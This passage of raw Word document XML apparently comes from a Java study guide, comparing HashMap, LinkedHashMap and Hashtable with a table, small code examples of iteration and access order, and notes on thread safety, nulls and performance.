            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73CC2162"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rdered collections (insertion/access order)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="61BE1766" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EF9AB08"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teration Order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B232740"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npredictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EA597D1"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edictable (insertion or access order)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3E77C4D5" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5494823D"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Constructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6055445C"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ew HashMap()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422C7455"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ew LinkedHashMap()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3E0559BB" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C7050F"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 Order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5519D695"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t supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B49EC91"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pported with a constructor flag (accessOrder)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E5039B7" w14:textId="77777777" w:rsidR="00FF1E10"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8903889">
          <v:rect id="_x0000_i1449" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C31912" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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de Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5771E" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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ashMap Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7A0DA"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364294B3" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334F7823"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HashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC099C7"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19D83093"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HashMap&lt;String, Integer&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC439B"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Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584A60BB"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Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386DD474"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Cherry", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C3CE8"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1397729"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or (String key : map.keySet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D226F"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key + ": " + map.get(key));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EBB30"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0A014FD"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8520965"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E3F5F93" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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output will not be in any particular order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60427C37" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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LinkedHashMap Example (Insertion Order):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A446E2"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nkedHashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46404470" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8E4BBD"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LinkedHashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC5D57"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7F95979C"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nkedHashMap&lt;String, Integer&gt; map = new LinkedHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E6470A"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Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25401EC7"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Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E99176"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Cherry", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E1530"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DFFAA8D"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or (String key : map.keySet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043ED471"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key + ": " + map.get(key));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7968B835"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16FBC32"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6939637"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6F6A3D5" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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output will be in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7F2EE" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>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pple: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F520D" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>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anana: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076BA267" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>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herry: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47420F8D" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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LinkedHashMap Example (Access Order):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B6EA9"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nkedHashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB12C73" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A031690"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LinkedHashMapAccessOrderExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53856389"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3F4854B6"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nkedHashMap&lt;String, Integer&gt; map = new LinkedHashMap&lt;&gt;(16, 0.75f, true); // Access order enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6B111"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123C90C"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Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E48C1A"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Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDFAADF"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Cherry", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AAF64B"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AB76772"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ccess some elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69087633"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get("Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AB710D"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get("Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401CB020" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279DA281"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 Iterating will show that "Apple" and "Banana" are moved to the end due to access order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656FF166"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or (String key : map.keySet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128CBB49"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key + ": " + map.get(key));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9A235"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2D0980D"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76631E5"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694EBBE" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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output will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A24B1CB" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>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herry: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC55D16" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>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pple: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90F280" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>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anana: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B40CB7" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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 "Apple" and "Banana" were accessed, so they moved to the end in the access order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC58790" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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70EEA090" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you do not care about the order of the elements and you need the fastest performance for lookups and insertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D929AE5" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to maintain the order of insertion or the order in which the elements were accessed (e.g., for cache implementation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C1AA08" w14:textId="5A1A8440" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF1E1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10AE5B1">
          <v:rect id="_x0000_i1450" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC881C1" w14:textId="69147530" w:rsidR="00220548" w:rsidRPr="00CE4B95" w:rsidRDefault="00220548">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc196307618"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and HashTable?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w14:paraId="75B09FC6" w14:textId="741BFBFD" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">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oth </w:t>
      </w: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Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are part of the Java Collections Framework and are used to store key-value pairs. However, there are some important differences between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE6493" w14:textId="77777777" w:rsidR="00121FDE"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1B530D6">
          <v:rect id="_x0000_i1451" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B950656" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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Thread-Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20EE27" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D3100" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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t Thread-Safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap is not synchronized, meaning it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. If multiple threads access a HashMap concurrently and at least one of them modifies it, it must be externally synchronized to avoid concurrent modification issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D96E1" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F021353" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hashtable is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Multiple threads can access a Hashtable at the same time without causing data corruption. However, the synchronization comes at the cost of performance, making Hashtable slower than HashMap in a single-threaded context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC2BF8" w14:textId="77777777" w:rsidR="00121FDE"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F1F66D2">
          <v:rect id="_x0000_i1452" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FBA9C" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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Null Keys and Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946D3B4" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3482D9" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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llows Null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one null key</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multiple null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C8C3C" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECA5A1" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Null Keys or Values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hashtable does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not allow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null key</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null value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If you try to insert a null key or value, it will throw a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059ABE13" w14:textId="77777777" w:rsidR="00121FDE"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B86167">
          <v:rect id="_x0000_i1453" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A954E" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE7FDE" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C39C6" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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aster</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap is generally faster than Hashtable because it is not synchronized. It is suitable for single-threaded applications or when thread synchronization is handled externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59811767" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
